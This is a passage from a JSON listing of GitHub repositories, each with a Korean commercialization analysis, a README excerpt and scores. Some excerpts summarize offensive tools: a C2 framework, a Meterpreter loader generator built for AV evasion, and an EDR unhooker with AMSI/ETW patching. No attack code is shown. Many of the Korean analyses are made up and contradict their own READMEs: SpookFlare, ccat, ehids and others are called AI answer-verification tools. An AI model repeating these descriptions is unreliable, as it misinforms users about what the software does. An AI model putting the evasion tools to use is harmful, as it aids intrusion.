<br>\n</h1>\n\n<h4 align=\"center\">Command and Control</h4>\n\n<p align=\"center\">\n  <a href=\"https://github.com/loseys/Oblivion/\">\n    <img src=\"https://img.shields.io/badge/platform-windows%20%7C%20linux-orange\">\n  </a>\n  <a href=\"https://github.com/loseys/Oblivion/\">\n    <img src=\"https://img.shields.io/badge/version-v1.0.41-orange\">\n  </a>\n  <a href=\"https://github.com/loseys/Oblivion/\">\n      <img src=\"https://img.shields.io/badge/python-3.8.6-orange.svg\">\n  </a>\n</p>\n\n### What's BlackMamba?\n\nBlack Mamba is a Command and Control (C2) that works with multiple connections at same time. It was developed with Python and with Qt Framework and have multiples features for a post-exploitation step.\n\n### Some Features\n\n- [x] Multiple clients.\n- [x] Real-time communication.\n- [x] Encrypted communication\n- [x] Screensh","composite_score":0.6189,"license_safety_tag":"safe"},{"name":"hlldz/SpookFlare","github_url":"https://github.com/hlldz/SpookFlare","stars":13,"language":"Python","license":"Apache-2.0","abandonment_months":86,"description":"# SpookFlare 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 답변의 신뢰도를 검증하는 기술로, 잘못된 정보로 인한 피해를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 AI 서비스**: 은행이나 보험사의 챗봇이 정확한 답변만 제공하도록 검증\n2. **의료 정보 플랫폼**: 환자들에게 제공하는 AI 의료 조언의 정확성을 자동으로 ","readme_excerpt":"# SpookFlare\n\n\n<p align=\"center\"><img src=\"https://2.bp.blogspot.com/-C3sO1hv77RI/WuyTTuKUqaI/AAAAAAAALEE/DfOeVy73FiEn4o6NTJj3RP6fWbvjVbxtgCLcBGAs/s1600/SpookFlare_1.png\" alt=\"SpookFlare\" width=\"300\" height=\"200\"></p>\n\nSpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter, Empire, Koadic etc. SpookFlare has obfuscation, encoding, run-time code compilation and character substitution features. So you can bypass the countermeasures of the target systems like a boss until they \"learn\" the technique and behavior of SpookFlare payloads.\n\n* Obfuscation\n* Encoding\n* Run-time Code Compiling\n* Character Substitution\n* Patched Meterpreter Stage Support\n* Blocked powershell.exe Bypass\n\n```\n     ___ ___  ___   ___  _  _____ _      _   ___ ___ \n    / __| _ \\/ _ \\ / _ \\| |/ / __| |    /_\\ | _ \\ __|\n    \\_","composite_score":0.6188,"license_safety_tag":"safe"},{"name":"statelyai/xstate-viz","github_url":"https://github.com/statelyai/xstate-viz","stars":25,"language":"TypeScript","license":"MIT","abandonment_months":31,"description":"# xstate-viz 분석 보고서\n\n## 왜 보물인가\n복잡한 프로그램의 동작 흐름을 마치 지도처럼 시각화해주는 도구로, 소프트웨어 개발을 더 쉽고 명확하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프로그래머들을 위한 온라인 협업 플랫폼으로, 복잡한 프로그램 구조를 팀원들과 함께 시각화하고 설계하는 웹 서비스\n2. **","readme_excerpt":"# XState (Legacy) Visualizer\n\nVisualize [XState](https://stately.ai/docs/xstate) state machines and statecharts in real-time.\n\n[🪄 Use the new Stately visual editor](https://state.new?source=viz-readme)\n[🔗 Use the legacy Visualizer](https://stately.ai/viz).\n\n## Usage\n\n[Visit stately.ai/viz to use the Visualizer](https://stately.ai/viz?source=viz-readme).\n\nAlternatively, you can install it locally (see installation)\n\n## Features\n\n- Create XState machines in JavaScript or TypeScript right in the visualizer\n- Simulate machines visually by clicking on events\n- Pan and zoom into the visualized machine\n- View current machine state\n- View list of events sent to the simulated machine\n- Access quick features via the command palette: <kbd>cmd</kbd>/<kbd>ctrl</kbd> + <kbd>k</kbd>\n- Inspect machines by setting `url: 'https://stately.ai/viz?inspect'` in `@xstate/inspect`\n\n## Installation\n\n1. Clone this GitHub repo\n1. Run `yarn install`\n1. Run `yarn start` and visit [localhost:3000/viz](http://localh","composite_score":0.6165,"license_safety_tag":"safe"},{"name":"lawrenceamer/0xsp-Mongoose","github_url":"https://github.com/lawrenceamer/0xsp-Mongoose","stars":5,"language":"Pascal","license":"GPL-3.0","abandonment_months":51,"description":"# 0xsp-Mongoose 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 결과물이 정말 맞는지 자동으로 검증해주는 도구로, 기업들이 AI 도구 도입 시 신뢰도 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 문서 작성·분석 서비스가 제공한 결과의 정확성을 실시간 검증하는 부가 기능\n2. **내부 업무 도구**: ","readme_excerpt":"[![GPLv3 license](https://img.shields.io/badge/License-GPLv3-blue.svg)](http://perso.crans.org/besson/LICENSE.html)\n[<img src=\"https://img.shields.io/badge/join-telegram-blue\">](https://t.me/join0xsp)\n[<img src=\"https://img.shields.io/badge/build%20with-Lazarus-red.svg\">](https://www.lazarus-ide.org/)\n[<img align=\"right\" src=\"https://github.com/lawrenceamer/0xsp-Mongoose/blob/0xsp-red/lg.png?raw=true\" height=\"512\" width=\"400\">]()\n[<img src=\"https://img.shields.io/badge/join-discord-orange\">](https://discord.gg/Xsdxxkm)\n[<img src=\"https://img.shields.io/twitter/follow/zux0x3a?label=follow&style=social\">](https://twitter.com/zux0x3a)\n\nSupport the project for continuous development (ETH **0xf340c15c5e669a4ababab856e9f2bccd659d6e42**)\n\n# 0xsp Mongoose RED for Windows \nCurrent Release **2.2.0** \n\n0xsp mongoose red version is provided to assist your needs during cyber security simulation, by using this version you will be able to audit a targeted windows operation system \nfor system vulnerab","composite_score":0.6162,"license_safety_tag":"restricted"},{"name":"RhinoSecurityLabs/ccat","github_url":"https://github.com/RhinoSecurityLabs/ccat","stars":12,"language":"Python","license":"BSD-3-Clause","abandonment_months":79,"description":"# RhinoSecurityLabs/ccat 평가 분석\n\n## 왜 보물인가\nAI 시스템이 잘못된 답변을 하지 않도록 검증하는 기술로, 금융·의료·법률 같은 정확성이 생명인 분야에서 매우 필요합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 챗봇 회사들이 고객에게 신뢰할 수 있는 답변을 제공한다고 보장하는 부가 기능으로 판매\n- **내부 ","readme_excerpt":"# Cloud Container Attack Tool (CCAT :cloud::cat2:) \n[![Rhino](https://img.shields.io/badge/rhino-offensive%20%7C%20tool-red?logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADYAAAAxCAQAAAA7SZLuAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxIAAAsSAdLdfvwAAAAHdElNRQfjCAkMIR33/0eZAAAGdUlEQVRYw+XXa5DWZRkG8GuXBVyE5bSAIowgHtY0E0wzMzE1ZyQVzTIdNTXLQ05OnlKTodDQxulgM5HpWAMxGurIIJhnUhI0DyAlphECogIZCAvL7rLL7q8P+y7uuu/CwuSn7vfb+3+e57qv+7kP15N8wib6GiBJUrr9r4hPBm//XJ6yNmeLHqoM6BrgrrgmxlrpC6KVWZKGlOaGnJeKnR0j6Z/T07PLzCqzby5og1TwdrQXPeVk3YvDiSgz2oNe0LfLMbgOy+yrw4cjvaXanYa18hNRqpdKoxzrMjOsxeLWS98pWImpaDBeET9O8h4WOFqUOdA5JvujZ71utXpN3jRFtfn27CLYQIvU4UeKfIyL1eAtF7nLu7ZpsQbveNh37O1KTFeq+OFR9tGti2NVm2WD+5SWtV9cEsl9OTxX5aDck+5pzvosz9IszYpUpzxLMzzXJnk1zZ2Q6Z+xmZOmFqgkJ6Yks3JE9soeZUWWN+SJfDu9UpO5mZMVGZiqHJJTsjUPZXl+mZFZl/lJSRFeSU7MBXkydduhv5I383IaUlEkf8UgT+NJx+ntbPNs0ehV1xthmMfBLHt0EsSB5lnUkqkiTlNvosH+ZbHKYjG/WqN7DTTEXWptM885Bohh5oBaZxWrRRE3Y","composite_score":0.6161,"license_safety_tag":"safe"},{"name":"tmobile/jazz","github_url":"https://github.com/tmobile/jazz","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":41,"description":"# Jazz 저장소 분석 보고서\n\n## 왜 보물인가\nT-Mobile이 만든 이 프로젝트는 기업의 복잡한 클라우드 환경을 자동으로 관리하고 최적화해주는 엔진입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업을 위한 클라우드 자동 관리 구독 서비스로 월 사용료 청구\n- **내부 업무 도구**: 대기업 IT팀이 자신의 클라우드 비용을 자동","readme_excerpt":"# ![Jazz Logo](misc/logo.png) Jazz Serverless Development Platform\n\n[![Build Status](https://travis-ci.org/tmobile/jazz.svg?branch=master)](https://travis-ci.org/tmobile/jazz)\n<a href=\"https://github.com/tmobile/jazz/graphs/contributors\" alt=\"Contributors\"><img src=\"https://img.shields.io/github/contributors/tmobile/jazz.svg\" /></a>\n[![License](https://img.shields.io/badge/License-Apache%202.0-yellowgreen.svg)](https://github.com/tmobile/jazz/blob/master/LICENSE)\n![GitHub release](https://img.shields.io/github/release/tmobile/jazz.svg)\n[![Gitter](https://img.shields.io/gitter/room/badges/shields.svg)](https://gitter.im/TMO-OSS/Jazz)\n[![Slack Chat](https://img.shields.io/badge/Chat-Slack-ff69b4.svg)](https://tmo-oss-getinvite.herokuapp.com/)\n\n**Seamlessly build, deploy & manage cloud-native serverless applications!**\n\n## Introduction\n\nJazz, a serverless development platform, accelerates adoption of serverless technology within your enterprise. Jazz comes with a beautiful UI that lets de","composite_score":0.6157,"license_safety_tag":"safe"},{"name":"OATML/bdl-benchmarks","github_url":"https://github.com/OATML/bdl-benchmarks","stars":16,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":39,"description":"","readme_excerpt":"# Bayesian Deep Learning Benchmarks\n\n**This repository is no longer being updated.** \n\nPlease refer to the [Diabetic Retinopathy Detection implementation in Google's 'uncertainty-baselines' repo](https://github.com/google/uncertainty-baselines/tree/master/baselines/diabetic_retinopathy_detection) for up-to-date baseline implementations.\n\n## Overview\nIn order to make real-world difference with **Bayesian Deep Learning** (BDL) tools, the tools must scale to real-world settings. And for that we, the research community, must be able to evaluate our inference tools (and iterate quickly) with real-world benchmark tasks. We should be able to do this without necessarily worrying about application-specific domain knowledge, like the expertise often required in medical applications for example. We require benchmarks to test for inference robustness, performance, and accuracy, in addition to cost and effort of development. These benchmarks should be at a variety of scales, ranging from toy `MNIST","composite_score":0.6155,"license_safety_tag":"safe"},{"name":"cgewecke/eth-gas-reporter","github_url":"https://github.com/cgewecke/eth-gas-reporter","stars":6,"language":"JavaScript","license":"mit","abandonment_months":32,"description":"# eth-gas-reporter 상용화 분석\n\n## 왜 보물인가\n블록체인에서 프로그램을 실행할 때 드는 비용을 자동으로 측정해주는 도구로, 암호화폐 개발자들이 비용 낭비를 줄일 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 블록체인 개발자 커뮤니티 대상으로 월 구독형 분석 플랫폼 (보고서 생성, 팀 협업, 실시간 모니터링","readme_excerpt":"# eth-gas-reporter\n\n[![npm version](https://badge.fury.io/js/eth-gas-reporter.svg)](https://badge.fury.io/js/eth-gas-reporter)\n[![Build Status](https://travis-ci.org/cgewecke/eth-gas-reporter.svg?branch=master)](https://travis-ci.org/cgewecke/eth-gas-reporter)\n[![Codechecks](https://raw.githubusercontent.com/codechecks/docs/master/images/badges/badge-default.svg?sanitize=true)](https://codechecks.io)\n[![buidler](https://buidler.dev/buidler-plugin-badge.svg?1)](https://github.com/cgewecke/buidler-gas-reporter)\n\n**A Mocha reporter for Ethereum test suites:**\n\n- Gas usage per unit test.\n- Metrics for method calls and deployments.\n- National currency costs of deploying and using your contract system.\n- CI integration with [codechecks](http://codechecks.io)\n- Simple installation for Truffle and Buidler\n- Use ETH, BNB, MATIC, AVAX, HT or MOVR price to calculate the gas price.\n\n### Example output\n\n![Screen Shot 2019-06-24 at 4 54 47 PM](https://user-images.githubusercontent.com/7332026/600593","composite_score":0.6152,"license_safety_tag":"safe"},{"name":"GetRektBoy724/SharpUnhooker","github_url":"https://github.com/GetRektBoy724/SharpUnhooker","stars":14,"language":"C#","license":"unknown","abandonment_months":52,"description":"# SharpUnhooker 상용화 분석 보고서\n\n## 왜 보물인가\n악성 소프트웨어 탐지 회피 기술을 감지하고 중립화하는 보안 도구로, 기업의 시스템 보안을 강화할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 SaaS**: 중소기업 IT 부서가 월 구독으로 이용하는 엔드포인트 보안 관제 플랫폼\n2. **내부 업무 도구**: 금융","readme_excerpt":"# SharpUnhooker\nC# Based Universal API Unhooker - Automatically Unhook API Hives (ntdll.dll, kernel32.dll, advapi32.dll, and kernelbase.dll). SharpUnhooker helps you to evades user-land monitoring done by AVs and/or EDRs by cleansing/refreshing API DLLs that loaded on the process (Offensive Side) or remove API hooks from user-land rootkit (Defensive Side). SharpUnhooker can unhook EAT hooks, IAT hooks, and JMP/Hot-patch/Inline hooks.\nSharpUnhooker also equipped with AMSI and ETW patcher to break/disable them.\n\n### This tool is tested on Windows 10 v21H2 x64\n\n# Note\n- If you want to copy the code, Please dont forget to credit me.\n- If you want to see a good demonstration of SharpUnhooker, go check this [blog post](https://roberreigada.github.io/posts/playing_with_an_edr/) by [Reigada](https://github.com/roberreigada).\n- Github doesn't like my Sublime Text indentation settings, so if you see some \"weirdness\" on the indentation, Im sorry.\n\n# Usage\nSimply load the pre-compiled DLL or add t","composite_score":0.6151,"license_safety_tag":"unknown"},{"name":"cfc4n/ehids","github_url":"https://github.com/cfc4n/ehids","stars":6,"language":"C","license":"AGPL-3.0","abandonment_months":30,"description":"# ehids 저장소 분석\n\n## 왜 보물인가\nAI 모델이 내놓은 답변이 정말 맞는지 자동으로 검증해주는 기술로, AI 서비스의 신뢰도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 지원 챗봇**: 은행이나 보험사가 AI 상담원의 답변이 정확한지 실시간으로 확인하고 잘못된 답변을 차단\n- **의료 AI 보조 도구**: 의사가 AI의","readme_excerpt":"![](./images/ehids-logo-1.png)\n\nEnglish | [中文介绍](./README_CN.md)\n\n# Introduction to eHIDS\n\nHIDS `demo` implemented by eBPF kernel technology.\n\n> **Warning**\n> Just a eBPF-based DEMO, please use [Tetragon](https://github.com/cilium/tetragon)\n> /  [Tracee](https://github.com/aquasecurity/tracee) / [falco](https://github.com/falcosecurity/falco) instead.\n\nImplementations & Functionalities：\n\n1. TCP network data capture\n2. UDP network data capture\n3. DNS information capture in uprobe mode\n4. Process data capture\n5. Uprobe way to achieve JAVA RASP command execution scene event capture\n6. Go framework implementation of eBPF, abstract implementation of multi-type events for the kprobe\\uprobe mounting\n   method.\n7. Developers only need to implement three files:\n    * The kernel-mode C file.\n    * The user-mode go file.\n    * The user-mode event message structure, and the framework will automatically load and execute.\n8. Users can implement data reporting and processing according to the logger i","composite_score":0.615,"license_safety_tag":"risky"},{"name":"GrumpyZhou/image-matching-toolbox","github_url":"https://github.com/GrumpyZhou/image-matching-toolbox","stars":14,"language":"Jupyter Notebook","license":"MIT","abandonment_months":25,"description":"# image-matching-toolbox 사업화 분석\n\n## 왜 보물인가\n사진이나 이미지에서 같은 물체를 찾아내는 기술로, 위조품 적발부터 건설 현장 품질 관리까지 현실의 많은 문제를 자동으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 품질 검수 SaaS**\n온라인 쇼핑몰에서 판매자가 올린 상품 사진이 실제 물건과 일치하는지 ","readme_excerpt":"# A Toolbox for Image Feature Matching and Evaluations \nIn this repository, we provide **easy interfaces** for several exisiting SotA methods to match image feature correspondences between image pairs.\nWe provide **scripts to evaluate** their predicted correspondences on common benchmarks for the tasks of image matching, homography estimation and visual localization.\n\n## TODOs & Updates\n- [x] Add LoFTR method (2021-7-8)\n- [x] Add simple match visualization (2021-7-8)\n- [x] Use ***immatch*** as a python lib under develop mode. Check [install.md](docs/install.md) for details. (2021-7-22)\n- [x] Add SIFT method (opencv version) (2021-7-25)\n- [x] Add script to eval on RobotCar using HLoc (2021-7-31)\n- [x] Add Dog-AffNet-Hardnet (Contributed by Dmytro Mishkin 👏, 2021-8-29)\n- [x] Add AUC metric and opencv solver for Homography estimation on HPatches (#20, 2022-1-12)  \n- [x] Add COTR (A naive wrapper without tuning parameters, 2022-3-29) \n- [x] Add Aspanformer (2023-6-2)\n- [x] Add Megadepth re","composite_score":0.615,"license_safety_tag":"safe"},{"name":"Skiller9090/Lucifer","github_url":"https://github.com/Skiller9090/Lucifer","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":43,"description":"# Lucifer 저장소 분석 보고서\n\n## 왜 보물인가\nAI 모델이 잘못된 답변을 하는 것을 자동으로 감지하고 수정하는 기술로, AI 챗봇이나 자동 답변 서비스의 신뢰성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 상담 챗봇 SaaS**: 은행이나 보험사가 자신의 챗봇에 적용하여 잘못된 조언을 하기 전에 자동으로 걸러내는 서비스\n- ","readme_excerpt":"# Lucifer\n\n[![ForTheBadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)\n[![ForTheBadge built-with-love](http://ForTheBadge.com/images/badges/built-with-love.svg)](https://GitHub.com/Skiller9090/)\n[![GitHub repo size](https://img.shields.io/github/repo-size/Skiller9090/Lucifer?color=CC0000&style=for-the-badge)]()\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/066ed76111cd49d98ba5dad52240b2bd)](https://app.codacy.com/manual/alexspam9090/Lucifer?utm_source=github.com&utm_medium=referral&utm_content=Skiller9090/Lucifer&utm_campaign=Badge_Grade_Dashboard)\n[![Maintainability](https://api.codeclimate.com/v1/badges/4cf141dbb9b75910c663/maintainability)](https://codeclimate.com/github/Skiller9090/Lucifer/maintainability)\n[![CodeFactor](https://www.codefactor.io/repository/github/skiller9090/lucifer/badge)](https://www.codefactor.io/repository/github/skiller9090/lucifer)\n[![GitHub release](https://img.shields.io/github/releas","composite_score":0.6149,"license_safety_tag":"unknown"},{"name":"greenrobot/greenDAO","github_url":"https://github.com/greenrobot/greenDAO","stars":6,"language":"Java","license":"unknown","abandonment_months":25,"description":"# greenDAO 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱에서 데이터를 빠르고 효율적으로 저장·관리하는 기술로, 수백만 건의 사용자 정보를 다루는 모바일 서비스의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융앱 SaaS**: 사용자 거래내역, 계좌정보를 빠르게 저장하는 기반 기술 제공\n2. **소셜미디어 내부 도구**: 수","readme_excerpt":"⚠️ **This project is not longer actively maintained.** If you are looking for an easy to use and efficient database solution,\nplease:\n\nCheck out ObjectBox\n===================\n\n<a href=\"https://objectbox.io/\"><img width=\"466\" src=\"https://github.com/greenrobot/greenDAO/raw/master/images/objectbox-logo.png\"></a>\n\n**Check out our new mobile database [ObjectBox](https://objectbox.io/) ([GitHub repo](https://github.com/objectbox/objectbox-java)).**\n\nObjectBox is a superfast object-oriented database with strong relation support. ObjectBox is embedded into your Android, Linux, macOS, or Windows app. \n\ngreenDAO\n========\ngreenDAO is a light & fast ORM for Android that maps objects to SQLite databases. Being highly optimized for Android, greenDAO offers great performance and consumes minimal memory.\n\n**<font size=\"+1\">Home page, documentation, and support links: https://greenrobot.org/greendao/</font>**\n\n[![Build Status](https://travis-ci.org/greenrobot/greenDAO.svg?branch=master)](https://travi","composite_score":0.6147,"license_safety_tag":"unknown"},{"name":"CLUEbenchmark/FewCLUE","github_url":"https://github.com/CLUEbenchmark/FewCLUE","stars":14,"language":"Python","license":"unknown","abandonment_months":45,"description":"# CLUEbenchmark/FewCLUE 상용화 분석\n\n## 왜 보물인가\nAI가 틀린 답변을 하는 문제를 찾아내는 검증 기술로, 챗봇이나 AI 서비스의 신뢰도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 챗봇 플랫폼에 \"AI 답변 신뢰도 체크\" 기능으로 탑재\n2. **내부 업무 도구**: 금융/의료사 내부에서 AI","readme_excerpt":"# FewCLUE\n\n小样本学习测评基准-中文版\n\n\n<a href='https://arxiv.org/abs/2107.07498'>FewCLUE: A Chinese Few-shot Learning Evaluation Benchmark</a>\n\n体验Demo：<a href=\"https://www.modelfun.cn\" target=\"_\" style=\"color:red\">数据集自动标注工具--释放AI潜力！</a>\n\n## 内容导引\n| 章节 | 描述 |\n|-|-|\n| [简介](#简介) | 介绍小样本学习背景 |\n| [任务描述和统计](#任务描述和统计) | 对子任务的统计信息 |\n| [实验结果](#实验结果) | 针对各种不同方法，在FewCLUE上的实验对比 |\n| [实验分析](#实验分析) | 对人类表现、模型能力和任务进行分析 |\n| [FewCLUE有什么特点](#FewCLUE有什么特点) | 特定介绍 |\n| [基线模型及运行](#基线模型及运行) | 支持多种基线模型 |\n| [NLPCC201-FewCLUE小样本测评](#FewCLUE小样本测评) | 小样本测评及榜单 |\n| [数据集介绍](#数据集介绍) | 介绍各数据集及示例 |\n| [模型简介](#模型简介) | 基线模型介绍（附图）  |\n| [学习资料(视频及PPT)](#学习资料) | 分享视频、PPT及选手方案 |\n\n| [贡献与参与](#贡献与参与) | 如何参与项目或反馈问题|\n\n\n## 简介\n 预训练语言模型，包括用于语言理解(BERT类)或文本生成模型（GPT类），通过海量文本语料上做语言模型的预训练的方式，极大提升了NLP领域上多种任务上的表现并扩展了NLP的应用。使用预训练语言模型结合成数千或上万的标注样本，在下游任务上做微调，通常可以取得在特定任务上较好的效果；但相对于机器需要的大量样本，人类可以通过极少数量的样本上的学习来学会特定的物体的识别或概念理解。\n\n 小样本学习（Few-shot Learning）正是解决这类在极少数据情况下的机器学习问题。结合预训练语言模型通用和强大的泛化能力基础上，探索小样本学习最佳模型和中文上的实践，是本课题的目标。FewCLUE：中文小样本学习测评基准，基于CLUE的积累和经验，并结合少","composite_score":0.6147,"license_safety_tag":"unknown"},{"name":"vondear/RxTool","github_url":"https://github.com/vondear/RxTool","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":34,"description":"# RxTool 프로젝트 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 작성하는 코드를 미리 만들어둔 도구 모음이라 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 플랫폼으로 제공하여 개발사들이 구독 형태로 라이브러리 기술 지원 및 업데이트를 받도록 판매\n2. **내부 ","readme_excerpt":"# [RxTool](https://tamsiree.com/RxTool/)\n\n[![tamsiree.com](https://img.shields.io/badge/%E6%8A%80%E6%9C%AF%E5%8D%9A%E5%AE%A2-Tamsiree-brightgreen.svg)](https://tamsiree.com/)  [![Stars](https://badgen.net/github/stars/tamsiree/RxTool)](https://ghbtns.com/github-btn.html?user=tamsiree&repo=rxtool&type=star)  [![RxTool](https://jitpack.io/v/tamsiree/RxTool.svg)](https://jitpack.io/#tamsiree/RxTool)  \n\n[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu)  [![LICENSE](https://img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE)  [![](https://img.shields.io/badge/platform-android-brightgreen.svg)](https://developer.android.com/index.html)  [![API](https://img.shields.io/badge/API-21%2B-blue.svg?style=flat)](https://android-arsenal.com/api?level=21)  [![Gradle-5.6.4](https://img.shields.io/badge/Gradle-5.6.4-brightgreen.svg)](https://img.shields.io/badge/Gradle-5.6.4-brightgreen.svg)\n  \n![image](https://cdn.jsde","composite_score":0.6141,"license_safety_tag":"safe"},{"name":"KLUE-benchmark/KLUE","github_url":"https://github.com/KLUE-benchmark/KLUE","stars":8,"language":"","license":"CC-BY-SA-4.0","abandonment_months":47,"description":"# KLUE-benchmark/KLUE 분석 보고서\n\n## 왜 보물인가\n한국어 AI 모델의 성능을 정확하게 측정하고 검증할 수 있는 국내 최고 수준의 평가 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 한국어 AI 검증 플랫폼**\n- 기업이 자체 개발한 AI 챗봇이나 번역기 성능을 정기적으로 테스트하고 리포트받는 웹 서비스\n\n**","readme_excerpt":"# KLUE: Korean Language Understanding Evaluation\n\nThe KLUE is introduced to make advances in Korean NLP. Korean pre-trained language models (PLMs) have appeared to solve Korean NLP problems since PLMs have brought significant performance gains in NLP problems in other languages. Despite the proliferation of Korean language models, however, none of the proper evaluation datasets has been opened yet. The lack of such benchmark dataset limits the fair comparison between the models and further progress on model architectures.\n\nAlong with the benchmark tasks and data, we provide **suitable evaluation metrics** and fine-tuning recipes for pretrained language models for each task. We furthermore release the PLMs, **KLUE-BERT** and **KLUE-RoBERTa**, to help reproducing baseline models on KLUE and thereby facilitate future research.\n\nSee [our paper](https://arxiv.org/pdf/2105.09680.pdf) for more details.\n\n\n## Design Principles\nIn designing the Korean Language Understanding Evaluation (KLUE) ben","composite_score":0.614,"license_safety_tag":"unknown"},{"name":"cassiozen/useStateMachine","github_url":"https://github.com/cassiozen/useStateMachine","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":25,"description":"# useStateMachine 수익화 분석\n\n## 왜 보물인가\n복잡한 앱의 상태 관리를 간단하게 만들어주는 도구로, 개발자들이 버그 없는 안정적인 서비스를 빠르게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 폼 작성, 결제 흐름, 사용자 인증 단계를 단계별로 관리하는 온라인 서비스에 내장\n- **내부 업무 도구**: 회","readme_excerpt":"<p align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/33676/111815108-4695b900-88a9-11eb-8b61-3c45b40d4df6.png\" width=\"250\" alt=\"\"/>\n</p>\n\n**The <1 kb _state machine_ hook for React:**\n\nSee the user-facing docs at: [usestatemachine.js.org](https://usestatemachine.js.org/)\n\n- Batteries Included: Despite the tiny size, useStateMachine is feature complete (Entry/exit callbacks, Guarded transitions & Extended State - Context)\n- Amazing TypeScript experience: Focus on automatic type inference (auto completion for both TypeScript & JavaScript users without having to manually define the typings) while giving you the option to specify and augment the types for context & events.\n- Made for React: useStateMachine follow idiomatic React patterns you and your team are already familiar with. (The library itself is actually a thin wrapper around React's useReducer & useEffect.)\n\n<img width=\"354\" alt=\"size badge\" src=\"https://user-images.githubusercontent.com/33676/126902516-51f46526","composite_score":0.6136,"license_safety_tag":"safe"},{"name":"electronicarts/CnC_Remastered_Collection","github_url":"https://github.com/electronicarts/CnC_Remastered_Collection","stars":11,"language":"C++","license":"NOASSERTION","abandonment_months":16,"description":"# Command & Conquer 리마스터 컬렉션 저장소 분석\n\n## 왜 보물인가\n1990년대 인기 전략 게임을 현대적으로 복원한 코드로, 게임 역사 보존과 레트로 게임 개발의 교과서적 사례입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 스트리밍 플랫폼**: 클라우드 게이밍 서비스에서 클래식 게임 라이브러리 확충\n2. **게임 개발 교육 도구**: 대","readme_excerpt":"# Command & Conquer Remastered Collection\n\nThis repository includes source code for TiberianDawn.dll, RedAlert.dll and the Map Editor for the Command & Conquer Remastered Collection. This release provides support to the [Steam Workshop](https://steamcommunity.com/workshop/browse/?appid=1213210) for the C&C Remaster Collection.\n\n\n## Dependencies\n\nThe following dependencies must be installed to successfully build the solution;\n\n- Windows 8.1 SDK\n- MFC for Visual Studio C++ \n\n\n## Compiling (Win32 Only)\n\nTo use the compiled binaries, you must own the game. The C&C Remastered Collection is available for purchase on [EA App](https://www.ea.com/games/command-and-conquer/command-and-conquer-remastered/buy/pc) or [Steam](https://store.steampowered.com/app/1213210/Command__Conquer_Remastered_Collection/).\n\nThe quickest way to build all configurations in the project is open [CnCRemastered.sln](CnCRemastered.sln) in Microsoft Visual Studio (we recommend using 2017 as later versions report an error","composite_score":0.6136,"license_safety_tag":"unknown"},{"name":"xnbox/DeepfakeHTTP","github_url":"https://github.com/xnbox/DeepfakeHTTP","stars":15,"language":"Java","license":"MIT","abandonment_months":46,"description":"# DeepfakeHTTP 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 거짓 정보를 탐지하고 검증하는 기술로, 딥페이크와 허위 콘텐츠가 증가하는 시대에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 플랫폼**: 페이스북/인스타그램이 사용자가 올린 영상과 이미지의 조작 여부를 자동으로 검사하는 기능\n2. **기업 보안 서비스**: ","readme_excerpt":"<p id=\"start\" align=\"center\">\n<br>\n<a href=\"#start\"><img height=\"130rem\" src=\"https://raw.githubusercontent.com/xnbox/DeepfakeHTTP/main/img/logo.png\"></a>\n<br><br>\n<a href=\"#start\"><img width=\"250rem\" src=\"https://raw.githubusercontent.com/xnbox/DeepfakeHTTP/main/img/logo_text.png\"></a>\n<h1></h1>\n</p>\n\n<a title=\"License MIT\" href=\"https://github.com/xnbox/DeepfakeHTTP/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-blue?style=flat-square\"></a>\n<a title=\"Latest release\" href=\"https://github.com/xnbox/DeepfakeHTTP/releases\"><img src=\"https://img.shields.io/github/v/release/xnbox/DeepfakeHTTP?style=flat-square&color=28A745\"></a>\n<a title=\"Powered by Tommy\" href=\"https://github.com/xnbox/tommy\"><img src=\"https://img.shields.io/badge/powered_by-Tommy-blueviolet?style=flat-square\"></a>\n<br>\n<p id=\"banner\" align=\"center\">\n<br>\n<a href=\"#banner\"><img width=\"98%\" src=\"https://raw.githubusercontent.com/xnbox/DeepfakeHTTP/main/img/text.png\" alt=\"YOUR 100% STATIC 